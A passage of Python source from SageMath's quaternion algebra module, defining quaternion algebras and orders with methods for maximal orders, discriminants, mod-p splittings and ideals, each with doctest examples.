K = self.base_ring()
return self([ K.random_element(*args, **kwds) for _ in range(4) ])
def vector_space(self):
"""
Return the vector space associated to ``self`` with inner product given
by the reduced norm.
EXAMPLES::
sage: QuaternionAlgebra(-3,19).vector_space()
Ambient quadratic space of dimension 4 over Rational Field
Inner product matrix:
[ 2 0 0 0]
[ 0 6 0 0]
[ 0 0 -38 0]
[ 0 0 0 -114]
"""
try:
return self.__vector_space
except AttributeError:
V = VectorSpace(self.base_ring(), 4, inner_product_matrix = self.inner_product_matrix())
self.__vector_space = V
return V
class QuaternionAlgebra_ab(QuaternionAlgebra_abstract):
"""
The quaternion algebra of the form `(a, b/K)`, where `i^2=a`, `j^2 = b`,
and `j*i = -i*j`. ``K`` is a field not of characteristic 2 and ``a``,
``b`` are nonzero elements of ``K``.
See ``QuaternionAlgebra`` for many more examples.
INPUT:
- ``base_ring`` -- commutative ring
- ``a, b`` -- elements of ``base_ring``
- ``names`` -- string (optional, default 'i,j,k') names of the generators
EXAMPLES::
sage: QuaternionAlgebra(QQ, -7, -21) # indirect doctest
Quaternion Algebra (-7, -21) with base ring Rational Field
"""
def __init__(self, base_ring, a, b, names='i,j,k'):
"""
Create the quaternion algebra with `i^2 = a`, `j^2 = b`, and
`i*j = -j*i = k`.
TESTS:
Test making quaternion elements (using the element constructor)::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ,-1,-2)
sage: a = Q(2/3); a
2/3
sage: type(a)
<type 'sage.algebras.quatalg.quaternion_algebra_element.QuaternionAlgebraElement_rational_field'>
sage: Q(a)
2/3
sage: Q([1,2,3,4])
1 + 2*i + 3*j + 4*k
sage: Q((1,2,3,4))
1 + 2*i + 3*j + 4*k
sage: Q(-3/5)
-3/5
The base ring must be a field::
sage: Q.<ii,jj,kk> = QuaternionAlgebra(ZZ,-5,-19)
Traceback (most recent call last):
...
TypeError: base ring of quaternion algebra must be a field
"""
ParentWithGens.__init__(self, base_ring, names=names)
self._a = a
self._b = b
if base_ring not in _Fields:
raise TypeError("base ring of quaternion algebra must be a field")
if is_RationalField(base_ring) and a.denominator() == 1 and b.denominator() == 1:
element_constructor = quaternion_algebra_element.QuaternionAlgebraElement_rational_field
elif is_NumberField(base_ring) and base_ring.degree() > 2 and base_ring.is_absolute() and \
a.denominator() == 1 and b.denominator() == 1 and base_ring.defining_polynomial().is_monic():
# This QuaternionAlgebraElement_number_field class is not
# designed to work with elements of a quadratic field. To
# do that, the main thing would be to implement
# __getitem__, etc. This would maybe give a factor of 2
# (or more?) speedup. Much care must be taken because the
# underlying representation of quadratic fields is a bit
# tricky.
element_constructor = quaternion_algebra_element.QuaternionAlgebraElement_number_field
else:
element_constructor = quaternion_algebra_element.QuaternionAlgebraElement_generic
self._populate_coercion_lists_(coerce_list=[base_ring], element_constructor=element_constructor)
self._gens = [self([0,1,0,0]), self([0,0,1,0]), self([0,0,0,1])]
def maximal_order(self, take_shortcuts = True):
r"""
Return a maximal order in this quaternion algebra.
The algorithm used is from [Voi2012]_.
INPUT:
- ``take_shortcuts`` -- (default: ``True``) if the discriminant is
prime and the invariants of the algebra are of a nice form, use
Proposition 5.2 of [Piz1980]_.
OUTPUT:
A maximal order in this quaternion algebra.
EXAMPLES::
sage: QuaternionAlgebra(-1,-7).maximal_order()
Order of Quaternion Algebra (-1, -7) with base ring Rational Field with basis (1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
sage: QuaternionAlgebra(-1,-1).maximal_order().basis()
(1/2 + 1/2*i + 1/2*j + 1/2*k, i, j, k)
sage: QuaternionAlgebra(-1,-11).maximal_order().basis()
(1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
sage: QuaternionAlgebra(-1,-3).maximal_order().basis()
(1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
sage: QuaternionAlgebra(-3,-1).maximal_order().basis()
(1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
sage: QuaternionAlgebra(-2,-5).maximal_order().basis()
(1/2 + 1/2*j + 1/2*k, 1/4*i + 1/2*j + 1/4*k, j, k)
sage: QuaternionAlgebra(-5,-2).maximal_order().basis()
(1/2 + 1/2*i - 1/2*k, 1/2*i + 1/4*j - 1/4*k, i, -k)
sage: QuaternionAlgebra(-17,-3).maximal_order().basis()
(1/2 + 1/2*j, 1/2*i + 1/2*k, -1/3*j - 1/3*k, k)
sage: QuaternionAlgebra(-3,-17).maximal_order().basis()
(1/2 + 1/2*i, 1/2*j - 1/2*k, -1/3*i + 1/3*k, -k)
sage: QuaternionAlgebra(-17*9,-3).maximal_order().basis()
(1, 1/3*i, 1/6*i + 1/2*j, 1/2 + 1/3*j + 1/18*k)
sage: QuaternionAlgebra(-2, -389).maximal_order().basis()
(1/2 + 1/2*j + 1/2*k, 1/4*i + 1/2*j + 1/4*k, j, k)
If you want bases containing 1, switch off ``take_shortcuts``::
sage: QuaternionAlgebra(-3,-89).maximal_order(take_shortcuts=False)
Order of Quaternion Algebra (-3, -89) with base ring Rational Field with basis (1, 1/2 + 1/2*i, j, 1/2 + 1/6*i + 1/2*j + 1/6*k)
sage: QuaternionAlgebra(1,1).maximal_order(take_shortcuts=False) # Matrix ring
Order of Quaternion Algebra (1, 1) with base ring Rational Field with basis (1, 1/2 + 1/2*i, j, 1/2*j + 1/2*k)
sage: QuaternionAlgebra(-22,210).maximal_order(take_shortcuts=False)
Order of Quaternion Algebra (-22, 210) with base ring Rational Field with basis (1, i, 1/2*i + 1/2*j, 1/2 + 17/22*i + 1/44*k)
sage: for d in ( m for m in range(1, 750) if is_squarefree(m) ): # long time (3s)
....: A = QuaternionAlgebra(d)
....: R = A.maximal_order(take_shortcuts=False)
....: assert A.discriminant() == R.discriminant()
We don't support number fields other than the rationals yet::
sage: K = QuadraticField(5)
sage: QuaternionAlgebra(K,-1,-1).maximal_order()
Traceback (most recent call last):
...
NotImplementedError: maximal order only implemented for rational quaternion algebras
REFERENCES:
.. [Piz1980] \A. Pizer. An Algorithm for Computing Modular Forms
on `\Gamma_0(N)`, J. Algebra 64 (1980), 340-390.
.. [Voi2012] \J. Voight. Identifying the matrix ring: algorithms
for quaternion algebras and quadratic forms, to appear.
"""
try: return self.__maximal_order
except AttributeError: pass
if self.base_ring() != QQ:
raise NotImplementedError("maximal order only implemented for rational quaternion algebras")
d_A = self.discriminant()
# The following only works over QQ if the discriminant is prime
# and if the invariants are of the special form
# (every quaternion algebra of prime discriminant has a representation
# of such a form though)
a, b = self.invariants()
if take_shortcuts and d_A.is_prime() and a in ZZ and b in ZZ:
a = ZZ(a)
b = ZZ(b)
i,j,k = self.gens()
# if necessary, try to swap invariants to match Pizer's paper
if (a != -1 and b == -1) or (b == -2) \
or (a != -1 and a != -2 and (-a) % 8 != 1):
a, b = b, a
i, j = j, i
k = i*j
basis = []
if (a,b) == (-1,-1):
basis = [(1+i+j+k)/2, i, j, k]
elif a == -1 and (-b).is_prime() and ((-b) % 4 == 3):
basis = [(1+j)/2, (i+k)/2, j, k]
elif a == -2 and (-b).is_prime() and ((-b) % 8 == 5):
basis = [(1+j+k)/2, (i+2*j+k)/4, j, k]
elif (-a).is_prime() and (-b).is_prime():
q = -b
p = -a
if q % 4 == 3 and kronecker_symbol(p,q) == -1:
a = 0
while (a*a*p + 1)%q != 0:
a += 1
basis = [(1+j)/2, (i+k)/2, -(j+a*k)/q, k]
if basis:
self.__maximal_order = self.quaternion_order(basis)
return self.__maximal_order
# The following code should always work (over QQ)
# Start with <1,i,j,k>
R = self.quaternion_order([1] + self.gens())
d_R = R.discriminant()
e_new_gens = []
# For each prime at which R is not yet maximal, make it bigger
for (p,p_val) in d_R.factor():
e = R.basis()
while self.quaternion_order(e).discriminant().valuation(p) > d_A.valuation(p):
# Compute a normalized basis at p
f = normalize_basis_at_p(list(e), p)
# Ensure the basis lies in R by clearing denominators
# (this may make the order smaller at q != p)
# Also saturate the basis (divide out p as far as possible)
V = self.base_ring()**4
A = matrix(self.base_ring(), 4, 4, [ list(g) for g in e ]);
e_n = []
x_rows = A.solve_left(matrix([ V(vec.coefficient_tuple()) for (vec,val) in f ]), check=False).rows()
denoms = [ x.denominator() for x in x_rows ]
for i in range(4):
vec = f[i][0]
val = f[i][1]
v = (val/2).floor()
e_n.append(denoms[i] / p**(v) * vec)
# for e_n to become p-saturated we still need to sort by
# ascending valuation of the quadratic form
lst = sorted(zip(e_n, [f[m][1].mod(2) for m in range(4)]),
key = itemgetter(1))
e_n = list(zip(*lst)[0])
# Final step: Enlarge the basis at p
if p != 2:
# ensure that v_p(e_n[1]**2) = 0 by swapping basis elements
if ZZ(e_n[1]**2).valuation(p) != 0:
if ZZ(e_n[2]**2).valuation(p) == 0:
e_n[1], e_n[2] = e_n[2], e_n[1]
else:
e_n[1], e_n[3] = e_n[3], e_n[1]
a = ZZ(e_n[1]**2)
b = ZZ(e_n[2]**2)
if b.valuation(p) > 0: # if v_p(b) = 0, then already p-maximal
F = ZZ.quo(p)
if F(a).is_square():
x = F(a).sqrt().lift()
if (x**2 - a).mod(p**2) == 0: # make sure v_p(x**2 - a) = 1
x = x + p
g = 1/p*(x - e_n[1])*e_n[2]
e_n[2] = g
e_n[3] = e_n[1]*g
else: # p == 2
t = e_n[1].reduced_trace()
a = -e_n[1].reduced_norm()
b = ZZ(e_n[2]**2)
if t.valuation(p) == 0:
if b.valuation(p) > 0:
x = a
if (x**2 - t*x + a).mod(p**2) == 0: # make sure v_p(...) = 1
x = x + p
g = 1/p*(x - e_n[1])*e_n[2]
e_n[2] = g
e_n[3] = e_n[1]*g
else: # t.valuation(p) > 0
(y,z,w) = maxord_solve_aux_eq(a, b, p)
g = 1/p*(1 + y*e_n[1] + z*e_n[2] + w*e_n[1]*e_n[2])
h = (z*b)*e_n[1] - (y*a)*e_n[2]
e_n[1:4] = [g,h,g*h]
if (1 - a*y**2 - b*z**2 + a*b*w**2).valuation(2) > 2:
e_n = basis_for_quaternion_lattice(list(e) + e_n[1:], reverse=True)
# e_n now contains elements that locally at p give a bigger order,
# but the basis may be messed up at other primes (it might not even
# be an order). We will join them all together at the end
e = e_n
e_new_gens.extend(e[1:])
e_new = basis_for_quaternion_lattice(list(R.basis()) + e_new_gens, reverse=True)
self.__maximal_order = self.quaternion_order(e_new)
return self.__maximal_order
def invariants(self):
"""
Return the structural invariants `a`, `b` of this quaternion
algebra: ``self`` is generated by `i`, `j` subject to
`i^2 = a`, `j^2 = b` and `j*i = -i*j`.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(15)
sage: Q.invariants()
(-3, 5)
sage: i^2
-3
sage: j^2
5
"""
return self._a, self._b
def __cmp__(self, other):
"""
Compare self and other.
EXAMPLES::
sage: cmp(QuaternionAlgebra(-1,-7), QuaternionAlgebra(-1,-7))
0
sage: cmp(QuaternionAlgebra(-1,-7), QuaternionAlgebra(-1,-5))
-1
sage: cmp(QuaternionAlgebra(-1,-7), QuaternionAlgebra(-1,-10))
1
"""
if not isinstance(other, QuaternionAlgebra_abstract):
return cmp(type(self), type(other))
c = cmp(self.base_ring(), other.base_ring())
if c: return c
return cmp((self._a, self._b), (other._a, other._b))
def gen(self, i=0):
"""
Return the `i^{th}` generator of ``self``.
INPUT:
- ``i`` - integer (optional, default 0)
EXAMPLES::
sage: Q.<ii,jj,kk> = QuaternionAlgebra(QQ,-1,-2); Q
Quaternion Algebra (-1, -2) with base ring Rational Field
sage: Q.gen(0)
ii
sage: Q.gen(1)
jj
sage: Q.gen(2)
kk
sage: Q.gens()
[ii, jj, kk]
"""
return self._gens[i]
def _repr_(self):
"""
Print representation.
TESTS::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ,-5,-2)
sage: type(Q)
<class 'sage.algebras.quatalg.quaternion_algebra.QuaternionAlgebra_ab'>
sage: Q._repr_()
'Quaternion Algebra (-5, -2) with base ring Rational Field'
sage: Q
Quaternion Algebra (-5, -2) with base ring Rational Field
sage: print(Q)
Quaternion Algebra (-5, -2) with base ring Rational Field
sage: str(Q)
'Quaternion Algebra (-5, -2) with base ring Rational Field'
"""
return "Quaternion Algebra (%r, %r) with base ring %s"%(self._a, self._b, self.base_ring())
def inner_product_matrix(self):
"""
Return the inner product matrix associated to ``self``, i.e. the
Gram matrix of the reduced norm as a quadratic form on ``self``.
The standard basis `1`, `i`, `j`, `k` is orthogonal, so this matrix
is just the diagonal matrix with diagonal entries `1`, `a`, `b`, `ab`.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(-5,-19)
sage: Q.inner_product_matrix()
[ 2 0 0 0]
[ 0 10 0 0]
[ 0 0 38 0]
[ 0 0 0 190]
sage: R.<a,b> = QQ[]; Q.<i,j,k> = QuaternionAlgebra(Frac(R),a,b)
sage: Q.inner_product_matrix()
[ 2 0 0 0]
[ 0 -2*a 0 0]
[ 0 0 -2*b 0]
[ 0 0 0 2*a*b]
"""
a, b = self._a, self._b
return diagonal_matrix(self.base_ring(), [2, -2*a, -2*b, 2*a*b])
def discriminant(self):
"""
Given a quaternion algebra `A` defined over a number field,
return the discriminant of `A`, i.e. the
product of the ramified primes of `A`.
EXAMPLES::
sage: QuaternionAlgebra(210,-22).discriminant()
210
sage: QuaternionAlgebra(19).discriminant()
19
sage: F.<a> = NumberField(x^2-x-1)
sage: B.<i,j,k> = QuaternionAlgebra(F, 2*a,F(-1))
sage: B.discriminant()
Fractional ideal (2)
sage: QuaternionAlgebra(QQ[sqrt(2)],3,19).discriminant()
Fractional ideal (1)
"""
try:
return self.__discriminant
except AttributeError:
pass
if not is_RationalField(self.base_ring()):
try:
F = self.base_ring()
self.__discriminant = F.hilbert_conductor(self._a, self._b)
except NotImplementedError:
raise ValueError("base field must be rational numbers or number field")
else:
self.__discriminant = hilbert_conductor(self._a, self._b)
return self.__discriminant
def ramified_primes(self):
"""
Return the primes that ramify in this quaternion algebra. Currently
only implemented over the rational numbers.
EXAMPLES::
sage: QuaternionAlgebra(QQ, -1, -1).ramified_primes()
[2]
"""
#TODO: more examples
return [f[0] for f in factor(self.discriminant())]
def _magma_init_(self, magma):
"""
Return Magma version of this quaternion algebra.
EXAMPLES::
sage: Q = QuaternionAlgebra(-1,-1); Q
Quaternion Algebra (-1, -1) with base ring Rational Field
sage: Q._magma_init_(magma) # optional - magma
'QuaternionAlgebra(_sage_[...],-1/1,-1/1)'
sage: A = magma(Q); A # optional - magma
Quaternion Algebra with base ring Rational Field, defined by i^2 = -1, j^2 = -1
sage: A.RamifiedPlaces() # optional - magma
[
Ideal of Integer Ring generated by 2
]
A more complicated example involving a quaternion algebra over a number field::
sage: K.<a> = QQ[sqrt(2)]; Q = QuaternionAlgebra(K,-1,a); Q
Quaternion Algebra (-1, sqrt2) with base ring Number Field in sqrt2 with defining polynomial x^2 - 2
sage: magma(Q) # optional - magma
Quaternion Algebra with base ring Number Field with defining polynomial x^2 - 2 over the Rational Field, defined by i^2 = -1, j^2 = sqrt2
sage: Q._magma_init_(magma) # optional - magma
'QuaternionAlgebra(_sage_[...],(_sage_[...]![-1, 0]),(_sage_[...]![0, 1]))'
"""
R = magma(self.base_ring())
return 'QuaternionAlgebra(%s,%s,%s)'%(R.name(),
self._a._magma_init_(magma),
self._b._magma_init_(magma))
def quaternion_order(self, basis, check=True):
"""
Return the order of this quaternion order with given basis.
INPUT:
- ``basis`` - list of 4 elements of ``self``
- ``check`` - bool (default: ``True``)
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(-11,-1)
sage: Q.quaternion_order([1,i,j,k])
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis (1, i, j, k)
We test out ``check=False``::
sage: Q.quaternion_order([1,i,j,k], check=False)
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis [1, i, j, k]
sage: Q.quaternion_order([i,j,k], check=False)
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis [i, j, k]
"""
return QuaternionOrder(self, basis, check=check)
def ideal(self, gens, left_order=None, right_order=None, check=True, **kwds):
r"""
Return the quaternion ideal with given gens over `\ZZ`.
Neither a left or right order structure need be specified.
INPUT:
- ``gens`` -- a list of elements of this quaternion order
- ``check`` -- bool (default: ``True``); if ``False``, then ``gens`` must
4-tuple that forms a Hermite basis for an ideal
- ``left_order`` -- a quaternion order or ``None``
- ``right_order`` -- a quaternion order or ``None``
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1)
sage: R.ideal([2*a for a in R.basis()])
Fractional ideal (2, 2*i, 2*j, 2*k)
"""
if self.base_ring() == QQ:
return QuaternionFractionalIdeal_rational(gens, left_order=left_order, right_order=right_order, check=check)
else:
raise NotImplementedError("ideal only implemented for quaternion algebras over QQ")
@cached_method
def modp_splitting_data(self, p):
r"""
Return mod `p` splitting data for this quaternion algebra at
the unramified prime `p`. This is `2\times 2`
matrices `I`, `J`, `K` over the finite field `\GF{p}` such that if
the quaternion algebra has generators `i, j, k`, then `I^2 =
i^2`, `J^2 = j^2`, `IJ=K` and `IJ=-JI`.
.. NOTE::
Currently only implemented when `p` is odd and the base
ring is `\QQ`.
INPUT:
- `p` -- unramified odd prime
OUTPUT:
- 2-tuple of matrices over finite field
EXAMPLES::
sage: Q = QuaternionAlgebra(-15, -19)
sage: Q.modp_splitting_data(7)
(
[0 6] [6 1] [6 6]
[1 0], [1 1], [6 1]
)
sage: Q.modp_splitting_data(next_prime(10^5))
(
[ 0 99988] [97311 4] [99999 59623]
[ 1 0], [13334 2692], [97311 4]
)
sage: I,J,K = Q.modp_splitting_data(23)
sage: I
[0 8]
[1 0]
sage: I^2
[8 0]
[0 8]
sage: J
[19 2]
[17 4]
sage: J^2
[4 0]
[0 4]
sage: I*J == -J*I
True
sage: I*J == K
True
The following is a good test because of the asserts in the code::
sage: v = [Q.modp_splitting_data(p) for p in primes(20,1000)]
Proper error handling::
sage: Q.modp_splitting_data(5)
Traceback (most recent call last):
...
NotImplementedError: algorithm for computing local splittings not implemented in general (currently require the first invariant to be coprime to p)
sage: Q.modp_splitting_data(2)
Traceback (most recent call last):
...
NotImplementedError: p must be odd
"""
if self.base_ring() != QQ:
raise NotImplementedError("must be rational quaternion algebra")
p = ZZ(p)
if not p.is_prime():
raise ValueError("p (=%s) must be prime"%p)
if p == 2:
raise NotImplementedError("p must be odd")
if self.discriminant() % p == 0:
raise ValueError("p (=%s) must be an unramified prime"%p)
i, j, k = self.gens()
F = GF(p)
i2 = F(i*i)
j2 = F(j*j)
M = MatrixSpace(F, 2)
I = M([0,i2,1,0])
if i2 == 0:
raise NotImplementedError("algorithm for computing local splittings not implemented in general (currently require the first invariant to be coprime to p)")
i2inv = 1/i2
a = None
for b in list(F):
if not b: continue
c = j2 + i2inv * b*b
if c.is_square():
a = -c.sqrt()
break
if a is None:
# do a fallback search, maybe needed in char 3 sometimes.
for J in M:
K = I*J
if J*J == j2 and K == -J*I:
return I, J, K
J = M([a,b,(j2-a*a)/b, -a])
K = I*J
assert K == -J*I, "bug in that I,J don't skew commute"
return I, J, K
def modp_splitting_map(self, p):
r"""
Return Python map from the (`p`-integral) quaternion algebra to
the set of `2\times 2` matrices over `\GF{p}`.
INPUT:
- `p` -- prime number
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(-1, -7)
sage: f = Q.modp_splitting_map(13)
sage: a = 2+i-j+3*k; b = 7+2*i-4*j+k
sage: f(a*b)
[12 3]
[10 5]
sage: f(a)*f(b)
[12 3]
[10 5]
"""
I, J, K = self.modp_splitting_data(p)
F = I.base_ring()
def phi(q):
v = [F(a) for a in q.coefficient_tuple()]
return v[0] + I*v[1] + J*v[2] + K*v[3]
return phi
############################################################
# Unpickling
############################################################
def unpickle_QuaternionAlgebra_v0(*key):
"""
The 0th version of pickling for quaternion algebras.
EXAMPLES::
sage: Q = QuaternionAlgebra(-5,-19)
sage: t = (QQ, -5, -19, ('i', 'j', 'k'))
sage: sage.algebras.quatalg.quaternion_algebra.unpickle_QuaternionAlgebra_v0(*t)
Quaternion Algebra (-5, -19) with base ring Rational Field
sage: loads(dumps(Q)) == Q
True
sage: loads(dumps(Q)) is Q
True
"""
return QuaternionAlgebra(*key)
class QuaternionOrder(Algebra):
"""
An order in a quaternion algebra.
EXAMPLES::
sage: QuaternionAlgebra(-1,-7).maximal_order()
Order of Quaternion Algebra (-1, -7) with base ring Rational Field with basis (1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
sage: type(QuaternionAlgebra(-1,-7).maximal_order())
<class 'sage.algebras.quatalg.quaternion_algebra.QuaternionOrder'>
"""
def __init__(self, A, basis, check=True):
"""
INPUT:
- ``A`` - a quaternion algebra
- ``basis`` - list of 4 integral quaternions in ``A``
- ``check`` - whether to do type and other consistency checks
.. WARNING::
Currently most methods silently assume that the ``A.base_ring()``
is ``QQ``.
EXAMPLES::
sage: A.<i,j,k> = QuaternionAlgebra(-3,-5)
sage: sage.algebras.quatalg.quaternion_algebra.QuaternionOrder(A, [1,i,j,k])
Order of Quaternion Algebra (-3, -5) with base ring Rational Field with basis (1, i, j, k)
sage: R = sage.algebras.quatalg.quaternion_algebra.QuaternionOrder(A, [1,2*i,2*j,2*k]); R
Order of Quaternion Algebra (-3, -5) with base ring Rational Field with basis (1, 2*i, 2*j, 2*k)
sage: type(R)
<class 'sage.algebras.quatalg.quaternion_algebra.QuaternionOrder'>
Over QQ and number fields it is checked whether the given
basis actually gives a an order (as a module over the maximal order):
sage: A.<i,j,k> = QuaternionAlgebra(-1,-1)
sage: A.quaternion_order([1,i,j,i-j])
Traceback (most recent call last):
...
ValueError: basis must have rank 4
sage: A.quaternion_order([2,i,j,k])
Traceback (most recent call last):
...
ValueError: lattice must contain 1
sage: A.quaternion_order([1,i/2,j/2,k/2])
Traceback (most recent call last):
...
ValueError: given lattice must be a ring
sage: K = QuadraticField(10)
sage: A.<i,j,k> = QuaternionAlgebra(K,-1,-1)
sage: A.quaternion_order([1,i,j,k])
Order of Quaternion Algebra (-1, -1) with base ring Number Field in a with defining polynomial x^2 - 10 with basis (1, i, j, k)
sage: A.quaternion_order([1,i/2,j,k])
Traceback (most recent call last):
...
ValueError: given lattice must be a ring
"""
if check:
# right data type
if not isinstance(basis, (list, tuple)):
raise TypeError("basis must be a list or tuple")
# right length
if len(basis) != 4:
raise ValueError("basis must have length 4")
# coerce to common parent
basis = tuple([A(x) for x in basis])
# has rank 4
V = A.base_ring()**4
if V.span([ V(x.coefficient_tuple()) for x in basis]).dimension() != 4:
raise ValueError("basis must have rank 4")
# The additional checks will work over QQ and over number fields,
# but we can't actually do much with an order defined over a number
# field
if A.base_ring() == QQ: # fast code over QQ
M = matrix(QQ, 4, 4, [ x.coefficient_tuple() for x in basis])
v = M.solve_left(V([1,0,0,0]))
if v.denominator() != 1:
raise ValueError("lattice must contain 1")
# check if multiplicatively closed
M1 = basis_for_quaternion_lattice(basis)
M2 = basis_for_quaternion_lattice(list(basis) + [ x*y for x in basis for y in basis])
if M1 != M2:
raise ValueError("given lattice must be a ring")
if A.base_ring() != QQ: # slow code over number fields (should eventually use PARI's nfhnf)
O = None
try:
O = A.base_ring().maximal_order()
except AttributeError:
pass
if O:
M = matrix(A.base_ring(), 4, 4, [ x.coefficient_tuple() for x in basis])
v = M.solve_left(V([1,0,0,0]))
if any([ not a in O for a in v]):
raise ValueError("lattice must contain 1")
# check if multiplicatively closed
Y = matrix(QQ, 16, 4, [ (x*y).coefficient_tuple() for x in basis for y in basis])
X = M.solve_left(Y)
if any([ not a in O for x in X for a in x ]):
raise ValueError("given lattice must be a ring")
self.__basis = basis
self.__quaternion_algebra = A
ParentWithGens.__init__(self, ZZ, names=None)
def gens(self):
"""
Return generators for self.
EXAMPLES::
sage: QuaternionAlgebra(-1,-7).maximal_order().gens()
(1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
"""
return self.__basis
def ngens(self):
"""
Return the number of generators (which is 4).
EXAMPLES::
sage: QuaternionAlgebra(-1,-7).maximal_order().ngens()
4
"""
return 4
def gen(self, n):
"""
Return the n-th generator.
INPUT:
- ``n`` - an integer between 0 and 3, inclusive.
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order(); R
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis (1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
sage: R.gen(0)
1/2 + 1/2*i
sage: R.gen(1)
1/2*j - 1/2*k
sage: R.gen(2)
i
sage: R.gen(3)
-k
"""
return self.__basis[n]
def __cmp__(self, R):
"""
Compare orders self and other. Two orders are equal if they
have the same basis and are in the same quaternion algebra.
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R == R # indirect doctest
True
sage: R == QuaternionAlgebra(-1,-1).maximal_order()
False
sage: R==5
False
"""
if not isinstance(R, QuaternionOrder):
return cmp(type(self), type(R))
c = cmp(self.__quaternion_algebra, R.__quaternion_algebra)
if c: return c
return cmp(self.__basis, R.__basis)
def basis(self):
"""
Return fix choice of basis for this quaternion order.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().basis()
(1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
return self.__basis
def quaternion_algebra(self):
"""
Return ambient quaternion algebra that contains this quaternion order.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().quaternion_algebra()
Quaternion Algebra (-11, -1) with base ring Rational Field
"""
return self.__quaternion_algebra
def _repr_(self):
"""
Return string representation of this order.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order()._repr_()
'Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis (1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)'
sage: QuaternionAlgebra(-11,-1).maximal_order()
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis (1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
return 'Order of %s with basis %s'%(self.quaternion_algebra(), self.basis())
def random_element(self, *args, **kwds):
"""
Return a random element of this order.
The args and kwds are passed to the random_element method of
the integer ring, and we return an element of the form
.. math::
ae_1 + be_2 + ce_3 + de_4
where `e_1`, ..., `e_4` are the basis of this order and `a`,
`b`, `c`, `d` are random integers.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().random_element()
-4 - 4*i + j - k
sage: QuaternionAlgebra(-11,-1).maximal_order().random_element(-10,10)
-9/2 - 7/2*i - 7/2*j - 3/2*k
"""
return sum( (ZZ.random_element(*args, **kwds) * b for b in self.basis()) )
def intersection(self, other):
"""
Return the intersection of this order with other.
INPUT:
- ``other`` - a quaternion order in the same ambient quaternion algebra
OUTPUT: a quaternion order
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.intersection(R)
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis (1/2 + 1/2*i, i, 1/2*j + 1/2*k, k)
We intersect various orders in the quaternion algebra ramified at 11::
sage: B = BrandtModule(11,3)
sage: R = B.maximal_order(); S = B.order_of_level_N()
sage: R.intersection(S)
Order of Quaternion Algebra (-1, -11) with base ring Rational Field with basis (1/2 + 1/2*j, 1/2*i + 5/2*k, j, 3*k)
sage: R.intersection(S) == S
True
sage: B = BrandtModule(11,5)
sage: T = B.order_of_level_N()
sage: S.intersection(T)
Order of Quaternion Algebra (-1, -11) with base ring Rational Field with basis (1/2 + 1/2*j, 1/2*i + 23/2*k, j, 15*k)
"""
if not isinstance(other, QuaternionOrder):
raise TypeError("other must be a QuaternionOrder")
A = self.quaternion_algebra()
if other.quaternion_algebra() != A:
raise ValueError("self and other must be in the same ambient quaternion algebra")
V = A.base_ring()**4
B = V.span([V(list(g)) for g in self.basis()], ZZ)
C = V.span([V(list(g)) for g in other.basis()], ZZ)
# todo -- A(list(e)) could be A(e)
return QuaternionOrder(A, [A(list(e)) for e in B.intersection(C).basis()])
def free_module(self):
r"""
Return the free `\ZZ`-module that corresponds to this order
inside the vector space corresponding to the ambient
quaternion algebra.
OUTPUT:
A free `\ZZ`-module of rank 4.
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.basis()
(1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
sage: R.free_module()
Free module of degree 4 and rank 4 over Integer Ring
Echelon basis matrix:
[1/2 1/2 0 0]
[ 0 1 0 0]
[ 0 0 1/2 1/2]
[ 0 0 0 1]
"""
try: return self.__free_module
except AttributeError: pass
V = self.quaternion_algebra().base_ring()**4
M = V.span([V(list(g)) for g in self.basis()], ZZ)
self.__free_module = M
return M
def discriminant(self):
r"""
Return the discriminant of this order, which we define as
`\sqrt{ det ( Tr(e_i \bar{e}_j ) ) }`, where `\{e_i\}` is the
basis of the order.
OUTPUT: rational number
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().discriminant()
11
sage: S = BrandtModule(11,5).order_of_level_N()
sage: S.discriminant()
55
sage: type(S.discriminant())
<type 'sage.rings.rational.Rational'>
"""
L = []
for d in self.basis():
MM = []
for e in self.basis():
MM.append( (d * e.conjugate()).reduced_trace() )
L.append(MM)
return (MatrixSpace(QQ, 4, 4)(L)).determinant().sqrt()
def left_ideal(self, gens, check=True):
r"""
Return the ideal with given gens over `\ZZ`.
INPUT:
- ``gens`` -- a list of elements of this quaternion order
- ``check`` -- bool (default: ``True``); if ``False``, then ``gens`` must
4-tuple that forms a Hermite basis for an ideal
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.left_ideal([2*a for a in R.basis()])
Fractional ideal (1 + i, 2*i, j + k, 2*k)
"""
if self.base_ring() == ZZ:
return QuaternionFractionalIdeal_rational(gens, left_order=self, check=check)
else:
raise NotImplementedError("ideal only implemented for quaternion algebras over QQ")
def right_ideal(self, gens, check=True):
r"""
Return the ideal with given gens over `\ZZ`.
INPUT:
